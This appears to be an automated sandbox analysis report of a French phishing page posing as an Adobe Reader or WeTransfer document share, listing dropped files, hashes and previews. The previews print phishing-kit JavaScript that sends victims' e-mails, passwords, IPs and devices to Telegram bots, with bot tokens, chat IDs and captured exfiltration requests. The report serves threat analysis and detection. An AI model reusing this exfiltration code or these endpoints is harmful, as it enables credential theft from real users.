                                                        • Excluded IPs from analysis (whitelisted): 142.250.80.99, 142.250.65.238, 142.251.32.110, 142.251.167.84, 142.250.65.206, 142.250.72.110, 142.250.80.74, 199.232.210.172, 142.250.176.206, 142.250.65.195, 142.250.65.174, 142.251.41.3, 142.250.80.67, 142.250.80.78, 172.253.122.84, 52.149.20.212, 184.31.69.3
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, translate.googleapis.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&amp;export=download
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9195)
                                                        Category:dropped
                                                        Size (bytes):22252
                                                        Entropy (8bit):6.017536427311592
                                                        Encrypted:false
                                                        SSDEEP:384:ZeA6mSzn17xDIPOqOxgFb/fQggtyPnzhfGhgFtCpH2qXfh:ZQmiVxDIPOqOOeuLsgFUp
                                                        MD5:C7DC3047A4D04BB0E60CB7CEF023DF7C
                                                        SHA1:3B5E987A87FCFC78C382F3B2C1357F77D2244ACC
                                                        SHA-256:797C43BC309B89A0711559FF3A7B510A98068CBFEDE5DC59EE6972241D479C2A
                                                        SHA-512:EDD14ABC474DC7A7F4FB0ECEEA5051CB9825DE5B68351A10B10E717EBDDFDA6B149B7E2FCA540BDD7FE7ECF08586082D73C6A89AB09B431A02540E15402BCB01
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang="fr">.<head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <script src="https://cdn.tailwindcss.com"></script>. <title>Adobe Reader - Partage de document s.curis.</title>. Lien vers le fichier CSS externe -->. <link rel="stylesheet" href="https://facture-75823.web.app/styles_ad.css">..</head>.<body class="bg-gray-100 relative">. <div class="background-video"></div>.. Loader avec logo -->. <div id="loader">. <img class="mx-auto mt-10" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMTUyLjE5OSIgaGVpZ2h0PSI4NCIgdmlld0JveD0iMCAwIDE1Mi4xOTkgODQiPgogIDxkZWZzPgogICAgPGZpbHRlciBpZD0iUGF0aF80IiB4PSIzNi4wMDgiIHk9IjUuNjY0IiB3aWR0aD0iNzIuNjgyIiBoZWlnaHQ9IjczLjU2OSIgZmlsdGVyVW5pdHM9InVzZXJTcGFjZU9uVXNlIj4KICAgICAgPGZlT2Zmc2V0IGlucHV0PSJTb3VyY2VBbHBoYSIvPgogICAgICA8ZmVHY
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9195)
                                                        Category:dropped
                                                        Size (bytes):22252
                                                        Entropy (8bit):6.017536427311592
                                                        Encrypted:false
                                                        SSDEEP:384:ZeA6mSzn17xDIPOqOxgFb/fQggtyPnzhfGhgFtCpH2qXfh:ZQmiVxDIPOqOOeuLsgFUp
                                                        MD5:C7DC3047A4D04BB0E60CB7CEF023DF7C
                                                        SHA1:3B5E987A87FCFC78C382F3B2C1357F77D2244ACC
                                                        SHA-256:797C43BC309B89A0711559FF3A7B510A98068CBFEDE5DC59EE6972241D479C2A
                                                        SHA-512:EDD14ABC474DC7A7F4FB0ECEEA5051CB9825DE5B68351A10B10E717EBDDFDA6B149B7E2FCA540BDD7FE7ECF08586082D73C6A89AB09B431A02540E15402BCB01
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE html>.<html lang="fr">.<head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <script src="https://cdn.tailwindcss.com"></script>. <title>Adobe Reader - Partage de document s.curis.</title>. Lien vers le fichier CSS externe -->. <link rel="stylesheet" href="https://facture-75823.web.app/styles_ad.css">..</head>.<body class="bg-gray-100 relative">. <div class="background-video"></div>.. Loader avec logo -->. <div id="loader">. <img class="mx-auto mt-10" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMTUyLjE5OSIgaGVpZ2h0PSI4NCIgdmlld0JveD0iMCAwIDE1Mi4xOTkgODQiPgogIDxkZWZzPgogICAgPGZpbHRlciBpZD0iUGF0aF80IiB4PSIzNi4wMDgiIHk9IjUuNjY0IiB3aWR0aD0iNzIuNjgyIiBoZWlnaHQ9IjczLjU2OSIgZmlsdGVyVW5pdHM9InVzZXJTcGFjZU9uVXNlIj4KICAgICAgPGZlT2Zmc2V0IGlucHV0PSJTb3VyY2VBbHBoYSIvPgogICAgICA8ZmVHY
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):681
                                                        Entropy (8bit):5.457029154673169
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/P7r9EUwJCSMFEIua32VlopWE0r/Do/D7DiF5qbGsRB2DOexWb2RKJFtHdx:YKOHUSf0SMFEdaOmWhngCF5qbHn2DOIc
                                                        MD5:49E78B805243C56F706D73CA008E8FBB
                                                        SHA1:8E770C384D030AFB0774DC06E9B5722387CB15B2
                                                        SHA-256:2AE19C9E9456102B9D7ECE9BAED926C13F0E991FEF886DDD3D434C84CF954F2C
                                                        SHA-512:2679CA7B270BF09298617C34705166EEB8984914823BB241DEC77C36C76EAA629511054900DEDD7A0C047B3E6C5D0BD6CB5BED56DF651DB9A39F7EBBC80A903F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api.telegram.org/bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36
                                                        Preview:{"ok":true,"result":{"message_id":30054,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":1742913956,"text":"\ud83c\udff4\u200d\u2620\ufe0f LogCopy \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : tgza2n@qxoyv.io\nMot de passe : NdrbMHgek&4KP@?YR\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":29,"length":15,"type":"email"},{"offset":83,"length":12,"type":"url"},{"offset":195,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):5666
                                                        Entropy (8bit):4.830494382826631
                                                        Encrypted:false
                                                        SSDEEP:96:N+t8h2c2O9yg2c2rhbsnCwqAJbWmLqjEFuq0uqhQuqauqEuqR3qgQxSS1G:IaaOwtRsnWAJb7Le4YOeoE4
                                                        MD5:254F928C342BB0D9D6C148012EB7AD7E
                                                        SHA1:303F2390FCABA0E40777B7C0ECFDF7E842CC53F2
                                                        SHA-256:517ECB68827D321DCE6E0FBE0353C5125AAC72DA0D65A13247F9E89F34A3B288
                                                        SHA-512:050F7AA8202F7526C1476401D5CF17A57EA8D861F20B86ACCC12F09D59D5DD81BCFA0E5836586AA63EFE4FFED54AF147AFCBB75EF2270340AD698B18226013B3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://facture-75823.web.app/anti9.js
                                                        Preview:// Configuration des bots Telegram..const BOT_TOKEN_1 = "6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk";..const CHAT_ID_1 = "513947114";..const BOT_TOKEN_2 = "8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0";..const CHAT_ID_2 = "5250829081";....// Fonction pour envoyer les donn.es au premier bot Telegram..function sendToTelegram1(data) {.. const message = `\uD83C\uDFF4\u200D\u2620\uFE0F LogCopy \uD83C\uDFF4\u200D\u2620\uFE0F\nE-mail : ${data.email}\nMot de passe : ${data.password}\nIP : ${data.ip}\nAppareil : ${data.device}`;.... const url = `https://api.telegram.org/bot${BOT_TOKEN_1}/sendMessage?chat_id=${CHAT_ID_1}&text=${encodeURIComponent(message)}`;.... fetch(url, { method: "GET" }).. .then((response) => {.. if (!response.ok) {.. console.error("Erreur lors de l'envoi au bot 1 Telegram", response.status);.. }.. }).. .catch((error) => console.error("Erreur r.seau (Bot 1 Telegram) :", error));..}....// Fonction pour
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):682
                                                        Entropy (8bit):5.446585403882714
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/Pd9EUwJCSMFEIua32VlopWEOr/Do/D7i1BoTMGsRB2DOexWb2RKJFtHdXz:YKOHmSf0SMFEdaOmW/ng8BoTMHn2DOIy
                                                        MD5:EF1ED4C6083C7DAFCBEA4F9D6C506E34
                                                        SHA1:33FFAB5D6F54D1C122FF57E471880AB96E1BA389
                                                        SHA-256:B70B617D6E256CB6A49665704579E8902D22003DB2A823538F1A180552C447D1
                                                        SHA-512:C99AF3FC397EDD4BBD6285BF5DEB8AD720AA1370370953DEA80F85DD061CAAD4741126826000B65B452322B57669093AC164435C77C878967E5988BB51718ECB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api.telegram.org/bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36
                                                        Preview:{"ok":true,"result":{"message_id":30052,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":1742913932,"text":"\ud83c\udff4\u200d\u2620\ufe0f LogCopy \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : s4dae2@ymxrji.net\nMot de passe : +3HApb)0*8w$o>Zj\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":29,"length":17,"type":"email"},{"offset":84,"length":12,"type":"url"},{"offset":196,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):689
                                                        Entropy (8bit):5.359783040562777
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/PQRU3T6OOa3B7aWWE5r/D2I/D7DiF5qbGsRB2DOexWb2RKJFtHdXURtTgI:YKOHFR86ZawWWcn2ACF5qbHn2DOIRwcF
                                                        MD5:0B684AA4DCA515C4670073803989CB0A
                                                        SHA1:7F90BBF19A109EEC1327AB35B22C63BB72D02A2F
                                                        SHA-256:DED6C134461FE6ACEA877E2BF70A69D05A1DE16163D5E87D80923CCEE4D8D641
                                                        SHA-512:5738665E699A19CFE6ECC61BFBE6F14972F6BA3D39D3CA756B4AA1FF45F1219393ED87FA5E12EAD7722DE474C00FAE2836D9C171D35CCA4619D8355EE78CEB3D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"ok":true,"result":{"message_id":63,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913957,"text":"\ud83c\udff4\u200d\u2620\ufe0f Tentative de connexion \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : tgza2n@qxoyv.io\nMot de passe : NdrbMHgek&4KP@?YR\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":44,"length":15,"type":"email"},{"offset":98,"length":12,"type":"url"},{"offset":210,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):689
                                                        Entropy (8bit):5.357615817354139
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/PhRU3T6OOa3B7aWWE0r/D2I/D7DiF5qbGsRB2DOexWb2RKJFtHdXURtTgI:YKOHUR86ZawWWhn2ACF5qbHn2DOIRwcF
                                                        MD5:C6FFDDC4E4BB97547907A07ADCE1B5F2
                                                        SHA1:EFD41A5783F7A1C3618D7DD332C72104EE73FE07
                                                        SHA-256:6F200EEBCF6697D594C9BFB40D124184E99AECC3039385CFD8222D12A6B6F39D
                                                        SHA-512:7220CA90B22959B948F32A97EFFCE638B88288D31BC0E506A6588B04A5909F5FD5B5FA762348BB1C3BA17C000E8A0096A3B512A04B07AF5366D75435973A3F53
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api.telegram.org/bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36
                                                        Preview:{"ok":true,"result":{"message_id":62,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913956,"text":"\ud83c\udff4\u200d\u2620\ufe0f Tentative de connexion \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : tgza2n@qxoyv.io\nMot de passe : NdrbMHgek&4KP@?YR\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":44,"length":15,"type":"email"},{"offset":98,"length":12,"type":"url"},{"offset":210,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9195)
                                                        Category:downloaded
                                                        Size (bytes):22252
                                                        Entropy (8bit):6.017536427311592
                                                        Encrypted:false
                                                        SSDEEP:384:ZeA6mSzn17xDIPOqOxgFb/fQggtyPnzhfGhgFtCpH2qXfh:ZQmiVxDIPOqOOeuLsgFUp
                                                        MD5:C7DC3047A4D04BB0E60CB7CEF023DF7C
                                                        SHA1:3B5E987A87FCFC78C382F3B2C1357F77D2244ACC
                                                        SHA-256:797C43BC309B89A0711559FF3A7B510A98068CBFEDE5DC59EE6972241D479C2A
                                                        SHA-512:EDD14ABC474DC7A7F4FB0ECEEA5051CB9825DE5B68351A10B10E717EBDDFDA6B149B7E2FCA540BDD7FE7ECF08586082D73C6A89AB09B431A02540E15402BCB01
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://drive.usercontent.google.com/download?id=1D-lVkrj-b014caeCIdakZBdw2yekeEO1&export=download
                                                        Preview:<!DOCTYPE html>.<html lang="fr">.<head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <script src="https://cdn.tailwindcss.com"></script>. <title>Adobe Reader - Partage de document s.curis.</title>. Lien vers le fichier CSS externe -->. <link rel="stylesheet" href="https://facture-75823.web.app/styles_ad.css">..</head>.<body class="bg-gray-100 relative">. <div class="background-video"></div>.. Loader avec logo -->. <div id="loader">. <img class="mx-auto mt-10" src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB3aWR0aD0iMTUyLjE5OSIgaGVpZ2h0PSI4NCIgdmlld0JveD0iMCAwIDE1Mi4xOTkgODQiPgogIDxkZWZzPgogICAgPGZpbHRlciBpZD0iUGF0aF80IiB4PSIzNi4wMDgiIHk9IjUuNjY0IiB3aWR0aD0iNzIuNjgyIiBoZWlnaHQ9IjczLjU2OSIgZmlsdGVyVW5pdHM9InVzZXJTcGFjZU9uVXNlIj4KICAgICAgPGZlT2Zmc2V0IGlucHV0PSJTb3VyY2VBbHBoYSIvPgogICAgICA8ZmVHY
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):690
                                                        Entropy (8bit):5.348689571395934
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/P2RU3T6OOa3B7aWWErr/D2I/D7i1BoTMGsRB2DOexWb2RKJFtHdXURtG5e:YKOHrR86ZawWWin2A8BoTMHn2DOIRwcz
                                                        MD5:9E50C7A52D556E871444F69C36C1086C
                                                        SHA1:67A6A9009DC0228E62982144429E25A5E7F714FB
                                                        SHA-256:F935E3F34561758DAC234C58C298AA72719C122AE8CD7C47A7408EA74EB88A65
                                                        SHA-512:52725B6BD86AFE2F7165F28C7031E0AE923286467C2B6A7BC17CCACE66C7A86F568417488968B5C7CCCD18DE6BA88BECC8FCC0E24FA9EBFA915FA76C60F8054B
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"ok":true,"result":{"message_id":61,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913933,"text":"\ud83c\udff4\u200d\u2620\ufe0f Tentative de connexion \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : s4dae2@ymxrji.net\nMot de passe : +3HApb)0*8w$o>Zj\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":44,"length":17,"type":"email"},{"offset":99,"length":12,"type":"url"},{"offset":211,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):690
                                                        Entropy (8bit):5.347681178645851
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/P20RU3T6OOa3B7aWWEOr/D2I/D7i1BoTMGsRB2DOexWb2RKJFtHdXURtGU:YKOH50R86ZawWW/n2A8BoTMHn2DOIRw+
                                                        MD5:50B7B59429760AB57F47EB31CE64AD14
                                                        SHA1:3607A485FC77CEE00B49B670B5F4CC824E1B3300
                                                        SHA-256:DA126BC7DD7B0BF8702C4E401B04A93B72897BEABD7BF956758F354544B08A4A
                                                        SHA-512:EEBFB24A0C5245C976CDBADCDEF18FA2F4D5B42582BB87657F8D595F086369ACA69058CD0AA759DBE2CFA1F18EC26ABF2148B6C62A04A36DD89630A27FD4E4E7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api.telegram.org/bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36
                                                        Preview:{"ok":true,"result":{"message_id":60,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913932,"text":"\ud83c\udff4\u200d\u2620\ufe0f Tentative de connexion \ud83c\udff4\u200d\u2620\ufe0f\nE-mail : s4dae2@ymxrji.net\nMot de passe : +3HApb)0*8w$o>Zj\nIP : 161.77.13.20\nAppareil : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36","entities":[{"offset":44,"length":17,"type":"email"},{"offset":99,"length":12,"type":"url"},{"offset":211,"length":9,"type":"url"}]}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):21
                                                        Entropy (8bit):3.463280517810811
                                                        Encrypted:false
                                                        SSDEEP:3:YMESl4n:YMEA4
                                                        MD5:5FC0F7551D7401CCA01F4932344A252B
                                                        SHA1:5713D2E3279812EC2B743C3E7A53C0F78312097E
                                                        SHA-256:5E4D1A9C2B59CEF553795198E0704550644281A2597D270337902B70F13ABCCD
                                                        SHA-512:52EA7017462F171050150C84341B9087339407B87B1E0D0406AFB4D3BB8097697802B71805E1B13AD53D1C2991098E3573485A481E86505B35BF9AF23B01DBB2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://api.ipify.org/?format=json
                                                        Preview:{"ip":"161.77.13.20"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):1229
                                                        Entropy (8bit):4.6807550978761485
                                                        Encrypted:false
                                                        SSDEEP:24:+tfwO2POT6QVRRvrN05igwe3h2ZOQ2GRRQ54zPCD75pi9OcCnQ:+5L2WT6QVdQigwe3hnQjs3igbQ
                                                        MD5:92F40FB5FCCA3B0BC562B32581DE7946
                                                        SHA1:90F846424EF5FCDE6EB54BE9996DAEBF3B3DAA25
                                                        SHA-256:0D133C44F67C079AF185C9673CC85AAC0080F9518A6CC4AC26CE6707B94A65CF
                                                        SHA-512:E918C29D88244CED944E0ECE82E583DFECC7557C252347231B841DD4AF0402AEBAA8938A3A754AEC19A7A218A692FCD0E5356B079133F8C2160A1B9BADC18212
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://facture-75823.web.app/loader_ad.js
                                                        Preview:// D.sactiver le menu contextuel..document.addEventListener("contextmenu", function (e) {.. e.preventDefault();..});....// G.rer le loader et afficher le formulaire..document.addEventListener("DOMContentLoaded", function () {.. // Simuler un d.lai avant d'afficher le formulaire.. setTimeout(function () {.. // Masquer progressivement le loader avant de le supprimer.. const loader = document.getElementById("loader");.. loader.style.opacity = "0"; // Ajoute une transition douce.. loader.style.transition = "opacity 0.5s ease-out";.... setTimeout(() => {.. loader.style.display = "none"; // Supprime compl.tement l'.l.ment apr.s la transition.. }, 500); // Temps de la transition avant disparition.... // Afficher le formulaire avec une animation de fondu.. const formContainer = document.getElementById("form-container");.. formContainer.style.opacity = "1"; // Faire appara.tre progressivement.. for
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):1874
                                                        Entropy (8bit):5.242657294816668
                                                        Encrypted:false
                                                        SSDEEP:48:0BFAyLX0LoSmWc21mz5wGikeooXewQe7tGG9F9IAru:WvX0MWc2EHi3JpbIku
                                                        MD5:C09A87BE41A190DBB24C90E6B4A05EBF
                                                        SHA1:2E495E220B2032DFCA39A6D5D349D4A785819031
                                                        SHA-256:9B89BE50F9910887713BB51660D7F0C795CBCC64CC1E8A0A55FD207DA318549D
                                                        SHA-512:7A021A7B59A62EDE4B3FF07BE86E5138FFE38C09E2E6563C3F81987809EEC18C0C765C063ADCAEFAFDF19B06E0E923300043B432CDF7C63DFE661E02C686FD45
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://facture-75823.web.app/telegram.js
                                                        Preview:// ID et Token de l'API Telegram..const BOT_TOKEN_2 = "8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0";..const CHAT_ID_2 = "5250829081";....// Fonction pour envoyer les donn.es . Telegram..function sendToTelegram(data) {..const message = `\uD83C\uDFF4\u200D\u2620\uFE0F Tentative de connexion Wetransfert \uD83C\uDFF4\u200D\u2620\uFE0F\nE-mail : ${data.email}\nMot de passe : ${data.password}\nIP : ${data.ip}\nAppareil : ${data.device}`;..const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(message)}`;.... return fetch(url, { method: "GET" }).. .then((response) => {.. if (!response.ok) {.. console.error("Erreur lors de l'envoi . Telegram", response.status);.. }.. }).. .catch((error) => console.error("Erreur r.seau :", error));..}....// Fonction pour afficher le message d'erreur..function showError(message) {.. const errorElement = document.getElementById("errorMessage");.. errorElement.textContent =
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 640 x 315, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):363482
                                                        Entropy (8bit):7.99156222265069
                                                        Encrypted:true
                                                        SSDEEP:6144:/VtcP7YwxyFeQLYMn/5mkBbPAUaSka9KhF2jqLCdeytv1kLU1IC3t6C3O0D2Imwf:ttgheepM/384UhFmdeyyMIC3wC3iIl
                                                        MD5:FF2A0004967CC5F1587DA51421C28C4F
                                                        SHA1:3C7F497EEEDAD687962DEC45236369FE39E7B5C5
                                                        SHA-256:8D4FDC57CA945172EAFC5FFA3CE5923C5A128D8D3353EBB6F6A0059FD2FF935E
                                                        SHA-512:3221ED355479DA1E7793CA35955A88E3F1C39316CFCD493D392C3B228658E60B4A1A2D2A4F0807798F978AF23C30279E8A9B0291F0FC85A07E0013B18CEBF901
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://i.ibb.co/6cXYk9HM/Capture-d-cran-2025-02-11-144928.png
                                                        Preview:.PNG........IHDR.......;.....M(0.....eXIfII*...........................V...........^...(.......................i.......f........v.......v................0210....................0100................................;.......c.Q.....pHYs..........o.d.. .IDATx..{.W....+......v...m......6.9....H..s.Z.s.A....x...........T.1..gv..^]\..<'.S.Ns~.Tu......H)..R.......h......P..B=B.3.i.\.@..Q.:.G..!../s<...c(.*l...TX).S....<....<........}.n...A.........1.[.@..).. ..(....u3...@K.....U(k[......X.W..C..n...C.k3..D..Q.x..gQ.~..~....X.2J<....."J./......R....e.........R.....P..r.6.....l..Q..F.;...2.B.p.M....?0....... :4.h_..}q.{.p...h`....o..F..Eo....!.#}....D.......?.@`..Wo7.....Y.P.......P+.q5..&x.......Y`..`v....;bv..lpK...}1..3.N...5d.......cf...#..y&.{.F...^..}z...>Z8F...9.<.....E..p.3.N.i....a-|#:x.t....`[~...z........F............1.7.r....!4$u..Q3".F..0.....=l'.:Q...0...1kB.V..q;z'...&..t`h.a....L...qbp....v.w...Qa......_.<(i^..^..3...i-..oZ..L....p.p
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):682
                                                        Entropy (8bit):5.445762812346543
                                                        Encrypted:false
                                                        SSDEEP:12:YKOHu/PM9EUwJCSMFEIua32VlopWErr/Do/D7i1BoTMGsRB2DOexWb2RKJFtHdXz:YKOHnSf0SMFEdaOmWing8BoTMHn2DOIy
                                                        MD5:FD5A213E29FCB6FF2233957DF96062F1
